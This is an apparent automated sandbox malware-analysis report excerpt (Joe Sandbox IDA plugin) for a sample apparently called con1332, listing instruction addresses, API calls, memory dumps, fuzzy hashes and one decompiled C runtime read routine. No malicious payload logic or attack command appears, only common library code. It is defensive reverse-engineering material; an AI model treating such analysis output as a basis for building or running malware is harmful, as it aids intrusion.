                                                                                                                                                                                                                                    0x00405837
                                                                                                                                                                                                                                    0x00405839
                                                                                                                                                                                                                                    0x0040583a
                                                                                                                                                                                                                                    0x00405842
                                                                                                                                                                                                                                    0x00405847
                                                                                                                                                                                                                                    0x0040584a
                                                                                                                                                                                                                                    0x0040584f
                                                                                                                                                                                                                                    0x0040591c
                                                                                                                                                                                                                                    0x0040591c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405855
                                                                                                                                                                                                                                    0x00405855
                                                                                                                                                                                                                                    0x00405859
                                                                                                                                                                                                                                    0x0040585b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405870
                                                                                                                                                                                                                                    0x00405872
                                                                                                                                                                                                                                    0x00405874
                                                                                                                                                                                                                                    0x00405874
                                                                                                                                                                                                                                    0x00405877
                                                                                                                                                                                                                                    0x0040587b
                                                                                                                                                                                                                                    0x00405881
                                                                                                                                                                                                                                    0x00405881
                                                                                                                                                                                                                                    0x00405885
                                                                                                                                                                                                                                    0x00405889
                                                                                                                                                                                                                                    0x00405897
                                                                                                                                                                                                                                    0x00405899
                                                                                                                                                                                                                                    0x004058a5
                                                                                                                                                                                                                                    0x004058a7
                                                                                                                                                                                                                                    0x004058b3
                                                                                                                                                                                                                                    0x004058b5
                                                                                                                                                                                                                                    0x004058c1
                                                                                                                                                                                                                                    0x004058c5
                                                                                                                                                                                                                                    0x004058c7
                                                                                                                                                                                                                                    0x004058c7
                                                                                                                                                                                                                                    0x004058c8
                                                                                                                                                                                                                                    0x004058b7
                                                                                                                                                                                                                                    0x004058b7
                                                                                                                                                                                                                                    0x004058b7
                                                                                                                                                                                                                                    0x004058a9
                                                                                                                                                                                                                                    0x004058a9
                                                                                                                                                                                                                                    0x004058a9
                                                                                                                                                                                                                                    0x0040589b
                                                                                                                                                                                                                                    0x0040589b
                                                                                                                                                                                                                                    0x0040589b
                                                                                                                                                                                                                                    0x0040588f
                                                                                                                                                                                                                                    0x00405892
                                                                                                                                                                                                                                    0x00405892
                                                                                                                                                                                                                                    0x004058cc
                                                                                                                                                                                                                                    0x004058cf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004058d1
                                                                                                                                                                                                                                    0x004058d9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004058db
                                                                                                                                                                                                                                    0x004058db
                                                                                                                                                                                                                                    0x004058e0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004058e2
                                                                                                                                                                                                                                    0x004058e4
                                                                                                                                                                                                                                    0x00405930
                                                                                                                                                                                                                                    0x0040593f
                                                                                                                                                                                                                                    0x00405942
                                                                                                                                                                                                                                    0x00405944
                                                                                                                                                                                                                                    0x00405949
                                                                                                                                                                                                                                    0x0040594c
                                                                                                                                                                                                                                    0x0040594e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405950
                                                                                                                                                                                                                                    0x00405950
                                                                                                                                                                                                                                    0x00405953
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405953
                                                                                                                                                                                                                                    0x004058e6
                                                                                                                                                                                                                                    0x004058ea
                                                                                                                                                                                                                                    0x004058ec
                                                                                                                                                                                                                                    0x004058f1
                                                                                                                                                                                                                                    0x004058f2
                                                                                                                                                                                                                                    0x004058f4
                                                                                                                                                                                                                                    0x004058f6
                                                                                                                                                                                                                                    0x004058f8
                                                                                                                                                                                                                                    0x004058f9
                                                                                                                                                                                                                                    0x00405904
                                                                                                                                                                                                                                    0x00405906
                                                                                                                                                                                                                                    0x0040590b
                                                                                                                                                                                                                                    0x0040590e
                                                                                                                                                                                                                                    0x00405911
                                                                                                                                                                                                                                    0x00405916
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405955
                                                                                                                                                                                                                                    0x00405955
                                                                                                                                                                                                                                    0x00405955
                                                                                                                                                                                                                                    0x00405961
                                                                                                                                                                                                                                    0x00405963
                                                                                                                                                                                                                                    0x00405967
                                                                                                                                                                                                                                    0x0040596d
                                                                                                                                                                                                                                    0x0040596e
                                                                                                                                                                                                                                    0x0040597c
                                                                                                                                                                                                                                    0x0040597d
                                                                                                                                                                                                                                    0x00405970
                                                                                                                                                                                                                                    0x00405970
                                                                                                                                                                                                                                    0x00405974
                                                                                                                                                                                                                                    0x00405975
                                                                                                                                                                                                                                    0x00405975
                                                                                                                                                                                                                                    0x00405985
                                                                                                                                                                                                                                    0x00405988
                                                                                                                                                                                                                                    0x0040598a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040598c
                                                                                                                                                                                                                                    0x0040598c
                                                                                                                                                                                                                                    0x00405990
                                                                                                                                                                                                                                    0x004059a5
                                                                                                                                                                                                                                    0x004059ad
                                                                                                                                                                                                                                    0x004059b6
                                                                                                                                                                                                                                    0x004059b6
                                                                                                                                                                                                                                    0x004059b9
                                                                                                                                                                                                                                    0x004059c5
                                                                                                                                                                                                                                    0x00405992
                                                                                                                                                                                                                                    0x00405992
                                                                                                                                                                                                                                    0x004059a2
                                                                                                                                                                                                                                    0x004059a2
                                                                                                                                                                                                                                    0x00405990
                                                                                                                                                                                                                                    0x0040598a
                                                                                                                                                                                                                                    0x00405916
                                                                                                                                                                                                                                    0x004058e4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405860
                                                                                                                                                                                                                                    0x00405860
                                                                                                                                                                                                                                    0x00405862
                                                                                                                                                                                                                                    0x00405864
                                                                                                                                                                                                                                    0x00405865
                                                                                                                                                                                                                                    0x00405868
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040586a
                                                                                                                                                                                                                                    0x0040586a
                                                                                                                                                                                                                                    0x0040586d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405868
                                                                                                                                                                                                                                    0x0040584f
                                                                                                                                                                                                                                    0x004057ea
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                                                                                                      • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                                                      • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                                                      • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 00405842
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 00405906
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 00405930
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                                                    • String ID: 1.2.3
                                                                                                                                                                                                                                    • API String ID: 680241177-2310465506
                                                                                                                                                                                                                                    • Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                                                                                                                                                                                                    • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02BF5A17 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 02BF5A45
                                                                                                                                                                                                                                      • Part of subcall function 02BFBAB4: __FF_MSGBANNER.LIBCMT ref: 02BFBAD7
                                                                                                                                                                                                                                      • Part of subcall function 02BFBAB4: __NMSG_WRITE.LIBCMT ref: 02BFBADE
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 02BF5AA9
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 02BF5B6D
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 02BF5B97
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _malloc
                                                                                                                                                                                                                                    • String ID: 1.2.3
                                                                                                                                                                                                                                    • API String ID: 1579825452-2310465506
                                                                                                                                                                                                                                    • Opcode ID: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                                                                                                                                                                                                                                    • Instruction ID: 362951664eef0b364225e256b84f9e992b276ed21efbffbfb43feb1c2549494b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7261CFB19487808FC7B09F29888066AFBE1FB45214F944DAED3DA83A01D775A44ECF52
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                                    			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E0040FC07(_t120, _t125, _t133);
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E0040BA30(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E0040E744(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E0040FA20(_t125, _t131, _t133);
												_pop(_t123);
												_push(_t106);
												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E0040BA30(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E0040BFC1(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E0040BFC1(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}





























                                                                                                                                                                                                                                    0x0040bcc2
                                                                                                                                                                                                                                    0x0040bcca
                                                                                                                                                                                                                                    0x0040bcce
                                                                                                                                                                                                                                    0x0040bcd3
                                                                                                                                                                                                                                    0x0040bcd5
                                                                                                                                                                                                                                    0x0040bcd8
                                                                                                                                                                                                                                    0x0040bcde
                                                                                                                                                                                                                                    0x0040bd01
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bce5
                                                                                                                                                                                                                                    0x0040bce5
                                                                                                                                                                                                                                    0x0040bce7
                                                                                                                                                                                                                                    0x0040bd08
                                                                                                                                                                                                                                    0x0040bd0b
                                                                                                                                                                                                                                    0x0040bd0d
                                                                                                                                                                                                                                    0x0040bd1c
                                                                                                                                                                                                                                    0x0040bd1c
                                                                                                                                                                                                                                    0x0040bd1f
                                                                                                                                                                                                                                    0x0040bd24
                                                                                                                                                                                                                                    0x0040bd29
                                                                                                                                                                                                                                    0x0040bd29
                                                                                                                                                                                                                                    0x0040bd2c
                                                                                                                                                                                                                                    0x0040bd2e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bd30
                                                                                                                                                                                                                                    0x0040bd30
                                                                                                                                                                                                                                    0x0040bd35
                                                                                                                                                                                                                                    0x0040bd38
                                                                                                                                                                                                                                    0x0040bd3b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bd3d
                                                                                                                                                                                                                                    0x0040bd40
                                                                                                                                                                                                                                    0x0040bd44
                                                                                                                                                                                                                                    0x0040bd4b
                                                                                                                                                                                                                                    0x0040bd4e
                                                                                                                                                                                                                                    0x0040bd50
                                                                                                                                                                                                                                    0x0040bd5a
                                                                                                                                                                                                                                    0x0040bd52
                                                                                                                                                                                                                                    0x0040bd55
                                                                                                                                                                                                                                    0x0040bd55
                                                                                                                                                                                                                                    0x0040bd61
                                                                                                                                                                                                                                    0x0040bd63
                                                                                                                                                                                                                                    0x0040be53
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bd69
                                                                                                                                                                                                                                    0x0040bd69
                                                                                                                                                                                                                                    0x0040bd69
                                                                                                                                                                                                                                    0x0040bd70
                                                                                                                                                                                                                                    0x0040bdb6
                                                                                                                                                                                                                                    0x0040bdb6
                                                                                                                                                                                                                                    0x0040bdb9
                                                                                                                                                                                                                                    0x0040be24
                                                                                                                                                                                                                                    0x0040be2a
                                                                                                                                                                                                                                    0x0040be2d
                                                                                                                                                                                                                                    0x0040beb8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bebe
                                                                                                                                                                                                                                    0x0040be33
                                                                                                                                                                                                                                    0x0040be37
                                                                                                                                                                                                                                    0x0040be87
                                                                                                                                                                                                                                    0x0040be87
                                                                                                                                                                                                                                    0x0040be8b
                                                                                                                                                                                                                                    0x0040be95
                                                                                                                                                                                                                                    0x0040be9a
                                                                                                                                                                                                                                    0x0040be9a
                                                                                                                                                                                                                                    0x0040bea2
                                                                                                                                                                                                                                    0x0040beaa
                                                                                                                                                                                                                                    0x0040beab
                                                                                                                                                                                                                                    0x0040beac
                                                                                                                                                                                                                                    0x0040bead
                                                                                                                                                                                                                                    0x0040beae
                                                                                                                                                                                                                                    0x0040bcf9
                                                                                                                                                                                                                                    0x0040bcf9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bcfe
                                                                                                                                                                                                                                    0x0040be39
                                                                                                                                                                                                                                    0x0040be3c
                                                                                                                                                                                                                                    0x0040be3f
                                                                                                                                                                                                                                    0x0040be44
                                                                                                                                                                                                                                    0x0040be45
                                                                                                                                                                                                                                    0x0040be45
                                                                                                                                                                                                                                    0x0040be45
                                                                                                                                                                                                                                    0x0040be48
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040be48
                                                                                                                                                                                                                                    0x0040bdbb
                                                                                                                                                                                                                                    0x0040bdbf
                                                                                                                                                                                                                                    0x0040bde0
                                                                                                                                                                                                                                    0x0040bde5
                                                                                                                                                                                                                                    0x0040bde7
                                                                                                                                                                                                                                    0x0040bde9
                                                                                                                                                                                                                                    0x0040bde9
                                                                                                                                                                                                                                    0x0040bdc1
                                                                                                                                                                                                                                    0x0040bdc8
                                                                                                                                                                                                                                    0x0040bdca
                                                                                                                                                                                                                                    0x0040bdd7
                                                                                                                                                                                                                                    0x0040bdd7
                                                                                                                                                                                                                                    0x0040bdd7
                                                                                                                                                                                                                                    0x0040bdda
                                                                                                                                                                                                                                    0x0040bdcc
                                                                                                                                                                                                                                    0x0040bdce
                                                                                                                                                                                                                                    0x0040bdd1
                                                                                                                                                                                                                                    0x0040bdd1
                                                                                                                                                                                                                                    0x0040bddc
                                                                                                                                                                                                                                    0x0040bddc
                                                                                                                                                                                                                                    0x0040bdeb
                                                                                                                                                                                                                                    0x0040bdee
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bdf4
                                                                                                                                                                                                                                    0x0040bdf4
                                                                                                                                                                                                                                    0x0040bdf5
                                                                                                                                                                                                                                    0x0040bdf9
                                                                                                                                                                                                                                    0x0040bdfe
                                                                                                                                                                                                                                    0x0040bdff
                                                                                                                                                                                                                                    0x0040be00
                                                                                                                                                                                                                                    0x0040be05
                                                                                                                                                                                                                                    0x0040be08
                                                                                                                                                                                                                                    0x0040be0a
                                                                                                                                                                                                                                    0x0040bec6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bec6
                                                                                                                                                                                                                                    0x0040be10
                                                                                                                                                                                                                                    0x0040be13
                                                                                                                                                                                                                                    0x0040beb4
                                                                                                                                                                                                                                    0x0040beb4
                                                                                                                                                                                                                                    0x0040beb4
                                                                                                                                                                                                                                    0x0040beb4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040beb4
                                                                                                                                                                                                                                    0x0040be19
                                                                                                                                                                                                                                    0x0040be1c
                                                                                                                                                                                                                                    0x0040be1e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040be1e
                                                                                                                                                                                                                                    0x0040bdee
                                                                                                                                                                                                                                    0x0040bd72
                                                                                                                                                                                                                                    0x0040bd75
                                                                                                                                                                                                                                    0x0040bd77
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bd79
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bd7f
                                                                                                                                                                                                                                    0x0040bd81
                                                                                                                                                                                                                                    0x0040bd83
                                                                                                                                                                                                                                    0x0040bd85
                                                                                                                                                                                                                                    0x0040bd85
                                                                                                                                                                                                                                    0x0040bd87
                                                                                                                                                                                                                                    0x0040bd8a
                                                                                                                                                                                                                                    0x0040be5b
                                                                                                                                                                                                                                    0x0040be5d
                                                                                                                                                                                                                                    0x0040be61
                                                                                                                                                                                                                                    0x0040be6a
                                                                                                                                                                                                                                    0x0040be6f
                                                                                                                                                                                                                                    0x0040be6f
                                                                                                                                                                                                                                    0x0040be72
                                                                                                                                                                                                                                    0x0040be77
                                                                                                                                                                                                                                    0x0040be78
                                                                                                                                                                                                                                    0x0040be79
                                                                                                                                                                                                                                    0x0040be7a
                                                                                                                                                                                                                                    0x0040be7b
                                                                                                                                                                                                                                    0x0040be81
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bd90
                                                                                                                                                                                                                                    0x0040bd99
                                                                                                                                                                                                                                    0x0040bd9e
                                                                                                                                                                                                                                    0x0040bda1
                                                                                                                                                                                                                                    0x0040bda3
                                                                                                                                                                                                                                    0x0040bda6
                                                                                                                                                                                                                                    0x0040bda8
                                                                                                                                                                                                                                    0x0040bdab
                                                                                                                                                                                                                                    0x0040bdae
                                                                                                                                                                                                                                    0x0040bdae
                                                                                                                                                                                                                                    0x0040be4b
                                                                                                                                                                                                                                    0x0040be4b
                                                                                                                                                                                                                                    0x0040be4b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bd69
                                                                                                                                                                                                                                    0x0040bd63
                                                                                                                                                                                                                                    0x0040bd2e
                                                                                                                                                                                                                                    0x0040bd0f
                                                                                                                                                                                                                                    0x0040bd14
                                                                                                                                                                                                                                    0x0040bd14
                                                                                                                                                                                                                                    0x0040bd17
                                                                                                                                                                                                                                    0x0040bd1a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bd1a
                                                                                                                                                                                                                                    0x0040bce9
                                                                                                                                                                                                                                    0x0040bce9
                                                                                                                                                                                                                                    0x0040bcee
                                                                                                                                                                                                                                    0x0040bcef
                                                                                                                                                                                                                                    0x0040bcf0
                                                                                                                                                                                                                                    0x0040bcf1
                                                                                                                                                                                                                                    0x0040bcf2
                                                                                                                                                                                                                                    0x0040bcf8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bcf8

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3886058894-0
                                                                                                                                                                                                                                    • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                                                    • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02BFBF29 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3886058894-0
                                                                                                                                                                                                                                    • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                                                    • Instruction ID: 373f9fc3f9bdb9be9ba98915995de5604a7aab3f5d72a533c6bd5cd3a9ac9513
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A351067190020DEBCBA0CF79CC4459EBFB6EF44328F1582AAEA25925D0D7719A99CF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02BFC9A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __fileno$__getptd_noexit__lock_file
                                                                                                                                                                                                                                    • String ID: 'B
                                                                                                                                                                                                                                    • API String ID: 3755561058-2787509829
